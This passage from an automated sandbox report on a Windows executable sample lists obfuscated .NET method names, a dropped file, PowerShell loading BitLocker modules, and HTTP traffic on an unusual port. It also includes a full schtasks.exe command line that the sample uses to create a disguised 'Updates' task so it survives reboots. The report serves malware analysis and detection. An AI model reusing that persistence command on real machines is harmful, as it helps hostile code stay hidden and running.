                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, muDhSpXPkaWtGtdX5MC.csHigh entropy of concatenated method names: 'NdULMPeH0Y', 'Er1LiV6pgl', 'akbLZWTdAf', 'scyLjbWQ9F', 'AdFL8Rhtye', 'SMSLn1ucys', 'FOZL0kqmFG', 'btoLQLoQs6', 'ik3LACLGXp', 'uMRL46MA7Z'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, lVrsRvAAKIBmDAjCj7.csHigh entropy of concatenated method names: 'jBvcjYO8VR', 'rEAcnScBhA', 'eACcQcGfkR', 'HlacAvRRnl', 'h9EcBcac7m', 'O0mcU1akTa', 'FZmcdUuVY7', 'vDIcqHMkEn', 'Oj8cLvmamR', 'W1Nc9rSx5R'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, pf0sQA4KGX4Cb5UbBX.csHigh entropy of concatenated method names: 'tWhY8fQrv6', 'zFqY0AwLyE', 'Pg9cgQlmID', 'AsNclCvabg', 'hQ4cFjGJxv', 'PxacTvlCc0', 'wGmcvEIe0r', 'nmwcW21pCl', 'v3scbTi1FJ', 'Qj4cRGPf9G'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, x9bdvNQOCuV2nB7v8T.csHigh entropy of concatenated method names: 'c1QSseQU40', 'qQtSmOmatD', 'pCTSO0Fni1', 'AgTSofdFm4', 'IeZSeDEBlE', 'IVOSpDvdE7', 'TU0SwpI3oe', 'GdnSI9xrJh', 'FV9SyoQoNg', 'N2ISKoCkqs'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, y6mgajH58xCCMCJyEw.csHigh entropy of concatenated method names: 'KhMXk9bdvN', 'SCuXrV2nB7', 'LAKXJIBmDA', 'ACjXC7Uf0s', 'PUbXBBX5BZ', 'R39XUMPlhw', 'eSjB116h68PxKOrSA4', 'ycX1OSCpph8rKawuMx', 'Q9gXXKKQHC', 'bRmX7rC12p'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, uTPyuxOpGucxINp0Hi.csHigh entropy of concatenated method names: 'ToString', 'ADjUGc8EuV', 'IWqUfYP5Af', 'LfRUgujaiq', 'Tb8UlPSCml', 'oHLUFVrjTe', 'FTCUTcPn7S', 'DJwUvnK0Vu', 'Pe9UWAwdoe', 'yLHUb5fg4T'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, CFgInTKNUgQwY9apQO.csHigh entropy of concatenated method names: 'u44LXmX69v', 'S0ML7xOTOo', 'gWxLHRW8AL', 'UXkLa84mZi', 'E4XLSInem5', 'wyoLYGcotA', 'rpJL6qIXD1', 'cGrqwKGImr', 'zkcqIHScvA', 'LZ9qy6HPZo'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, nhs725X77qqlp1KEoKf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IZc9sQ60VR', 'ECM9mG9MCi', 'nsA9ONNXEY', 'Xf69oYLlIE', 'gIn9eEOXDb', 'FOD9pXDAB2', 'yYr9w0tDKy'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, c6b9lgINh6yZHsc46I.csHigh entropy of concatenated method names: 'T9oqaJ6PHo', 'SSKqSXXnh9', 'u0gqcArwvd', 'CgKqYJXWl7', 'iDMq6kZ6E5', 'B5LqkOIueJ', 'cJpqrJLnmk', 'l6pq16hSJW', 'uBRqJgEtFS', 'ciaqCmUqQp'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, XgebogbwOsR0gfglTQ.csHigh entropy of concatenated method names: 'nXckMHmDJ1', 'yq6ki3Z6Px', 'kNEkZwdf9j', 'l8mkjCSxmW', 'MxOk83Vo6h', 'XOsknQlf96', 'iD7k0urPU0', 'W4ckQULa0o', 'nCbkAM3Qew', 'nrkk4rcXV8'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, e76RDfs2gMTWkMESU9.csHigh entropy of concatenated method names: 'cYvBRe4ITx', 'WyDB5XwVY2', 'oe5BsOmxPH', 'BWiBmOPU69', 'HuiBfHi5jM', 'ukZBgRkE4k', 'DyUBli1OxA', 'bo8BFdaH6K', 'qt8BT7oNHM', 'jA0BvRRd00'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, BuKFvcytlNej6Xmnlm.csHigh entropy of concatenated method names: 'M1jq2uwCFU', 'Tn5qfYjhZj', 'Xn1qghuX1p', 'ymCqlLwbJU', 'y5LqsNy8sn', 'aj5qFtliUi', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, PBZm392MPlhwZB1smS.csHigh entropy of concatenated method names: 'ERb6tC2RPO', 'kQa6S3jlpu', 'CAx6Y5Rqt5', 'FL46kMHMM2', 'Ewq6rYIClm', 'NJbYeQhPIb', 'rL0YpqvCZh', 'tUhYwJT6Mg', 'RvJYIbuxdV', 'G3NYy3NiIo'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, KMEUyHpk0r1NX0mCU0.csHigh entropy of concatenated method names: 'QBfdIGkJum', 'Is5dKjXoRh', 'lLjqPwkq3k', 'S1gqXhnKoa', 'MjAdGJYt0G', 'HI9d5bCQ3Z', 'OHMduo6TD3', 'BOBdsiYdBw', 'asvdm8bkBo', 'ItYdO0O1sq'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, YLZhRozVOXHF08W4EV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B3WLhl1Nqk', 'A7gLBDYqvp', 'w3aLUmAfcP', 'PSULdqE2Zl', 'bDrLqNfXur', 'zV6LLjSiBe', 'yaUL91hUno'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, VwQhcbvgaBqPqLYxwV.csHigh entropy of concatenated method names: 'p1eka595e5', 'FYckc1tBRR', 'Rokk6ZBYAd', 'YVo6KhCr1e', 'tXs6zPFhUy', 'eR9kPxrbmH', 'BC8kXl5nrX', 'bwOkDrTPfe', 'Dvbk70XZQx', 'pNgkH5nkF2'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, CZu7K8Dkcj1USqkK9x.csHigh entropy of concatenated method names: 'isiZpkcuL', 'iLpjhHKFF', 'MPinlaT63', 'TwK04TMt2', 'SAKAqsNDS', 'nmF4dpGnI', 'kLhiIFJRn4kKcc2xUY', 'Jp1MWLxOvFk6HYaUuq', 'BJyqrNInG', 'mBT94KvFK'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, w9m7i9uGNFMZ1XfNtL.csHigh entropy of concatenated method names: 'NKAhQUG6FH', 'QcthAMELp0', 'QjFh24Dvi0', 'lnlhfcyknX', 'A3BhlMdLiZ', 'EiQhFcUCJo', 'XUGhvVdBxM', 'oAMhWMoKty', 'jgfhRmTltr', 'ybghGFjmJe'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.csHigh entropy of concatenated method names: 'j2E7tDgvY1', 'mJ77aL46yD', 'u7j7S7CbD2', 'mHQ7cbompf', 'PtP7YckZQI', 'ubH76r2Ped', 'NoY7kgcL2Y', 'Ny77rMNpOr', 'aG371lXYus', 'FRr7JMKyMv'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, kKxwEIStxq1vPp0mrw.csHigh entropy of concatenated method names: 'Dispose', 'tn9XyElHc0', 'RkkDf5GE1i', 'UwnFF1hWV5', 'f76XKb9lgN', 'n6yXzZHsc4', 'ProcessDialogKey', 'iI8DPuKFvc', 'elNDXej6Xm', 'ClmDD0FgIn'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, muDhSpXPkaWtGtdX5MC.csHigh entropy of concatenated method names: 'NdULMPeH0Y', 'Er1LiV6pgl', 'akbLZWTdAf', 'scyLjbWQ9F', 'AdFL8Rhtye', 'SMSLn1ucys', 'FOZL0kqmFG', 'btoLQLoQs6', 'ik3LACLGXp', 'uMRL46MA7Z'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, lVrsRvAAKIBmDAjCj7.csHigh entropy of concatenated method names: 'jBvcjYO8VR', 'rEAcnScBhA', 'eACcQcGfkR', 'HlacAvRRnl', 'h9EcBcac7m', 'O0mcU1akTa', 'FZmcdUuVY7', 'vDIcqHMkEn', 'Oj8cLvmamR', 'W1Nc9rSx5R'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, pf0sQA4KGX4Cb5UbBX.csHigh entropy of concatenated method names: 'tWhY8fQrv6', 'zFqY0AwLyE', 'Pg9cgQlmID', 'AsNclCvabg', 'hQ4cFjGJxv', 'PxacTvlCc0', 'wGmcvEIe0r', 'nmwcW21pCl', 'v3scbTi1FJ', 'Qj4cRGPf9G'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, x9bdvNQOCuV2nB7v8T.csHigh entropy of concatenated method names: 'c1QSseQU40', 'qQtSmOmatD', 'pCTSO0Fni1', 'AgTSofdFm4', 'IeZSeDEBlE', 'IVOSpDvdE7', 'TU0SwpI3oe', 'GdnSI9xrJh', 'FV9SyoQoNg', 'N2ISKoCkqs'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, y6mgajH58xCCMCJyEw.csHigh entropy of concatenated method names: 'KhMXk9bdvN', 'SCuXrV2nB7', 'LAKXJIBmDA', 'ACjXC7Uf0s', 'PUbXBBX5BZ', 'R39XUMPlhw', 'eSjB116h68PxKOrSA4', 'ycX1OSCpph8rKawuMx', 'Q9gXXKKQHC', 'bRmX7rC12p'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, uTPyuxOpGucxINp0Hi.csHigh entropy of concatenated method names: 'ToString', 'ADjUGc8EuV', 'IWqUfYP5Af', 'LfRUgujaiq', 'Tb8UlPSCml', 'oHLUFVrjTe', 'FTCUTcPn7S', 'DJwUvnK0Vu', 'Pe9UWAwdoe', 'yLHUb5fg4T'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, CFgInTKNUgQwY9apQO.csHigh entropy of concatenated method names: 'u44LXmX69v', 'S0ML7xOTOo', 'gWxLHRW8AL', 'UXkLa84mZi', 'E4XLSInem5', 'wyoLYGcotA', 'rpJL6qIXD1', 'cGrqwKGImr', 'zkcqIHScvA', 'LZ9qy6HPZo'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, nhs725X77qqlp1KEoKf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IZc9sQ60VR', 'ECM9mG9MCi', 'nsA9ONNXEY', 'Xf69oYLlIE', 'gIn9eEOXDb', 'FOD9pXDAB2', 'yYr9w0tDKy'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, c6b9lgINh6yZHsc46I.csHigh entropy of concatenated method names: 'T9oqaJ6PHo', 'SSKqSXXnh9', 'u0gqcArwvd', 'CgKqYJXWl7', 'iDMq6kZ6E5', 'B5LqkOIueJ', 'cJpqrJLnmk', 'l6pq16hSJW', 'uBRqJgEtFS', 'ciaqCmUqQp'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, XgebogbwOsR0gfglTQ.csHigh entropy of concatenated method names: 'nXckMHmDJ1', 'yq6ki3Z6Px', 'kNEkZwdf9j', 'l8mkjCSxmW', 'MxOk83Vo6h', 'XOsknQlf96', 'iD7k0urPU0', 'W4ckQULa0o', 'nCbkAM3Qew', 'nrkk4rcXV8'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, e76RDfs2gMTWkMESU9.csHigh entropy of concatenated method names: 'cYvBRe4ITx', 'WyDB5XwVY2', 'oe5BsOmxPH', 'BWiBmOPU69', 'HuiBfHi5jM', 'ukZBgRkE4k', 'DyUBli1OxA', 'bo8BFdaH6K', 'qt8BT7oNHM', 'jA0BvRRd00'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, BuKFvcytlNej6Xmnlm.csHigh entropy of concatenated method names: 'M1jq2uwCFU', 'Tn5qfYjhZj', 'Xn1qghuX1p', 'ymCqlLwbJU', 'y5LqsNy8sn', 'aj5qFtliUi', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, PBZm392MPlhwZB1smS.csHigh entropy of concatenated method names: 'ERb6tC2RPO', 'kQa6S3jlpu', 'CAx6Y5Rqt5', 'FL46kMHMM2', 'Ewq6rYIClm', 'NJbYeQhPIb', 'rL0YpqvCZh', 'tUhYwJT6Mg', 'RvJYIbuxdV', 'G3NYy3NiIo'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, KMEUyHpk0r1NX0mCU0.csHigh entropy of concatenated method names: 'QBfdIGkJum', 'Is5dKjXoRh', 'lLjqPwkq3k', 'S1gqXhnKoa', 'MjAdGJYt0G', 'HI9d5bCQ3Z', 'OHMduo6TD3', 'BOBdsiYdBw', 'asvdm8bkBo', 'ItYdO0O1sq'
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, YLZhRozVOXHF08W4EV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B3WLhl1Nqk', 'A7gLBDYqvp', 'w3aLUmAfcP', 'PSULdqE2Zl', 'bDrLqNfXur', 'zV6LLjSiBe', 'yaUL91hUno'
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile created: C:\Users\user\AppData\Roaming\VcihjWRO.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49837
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
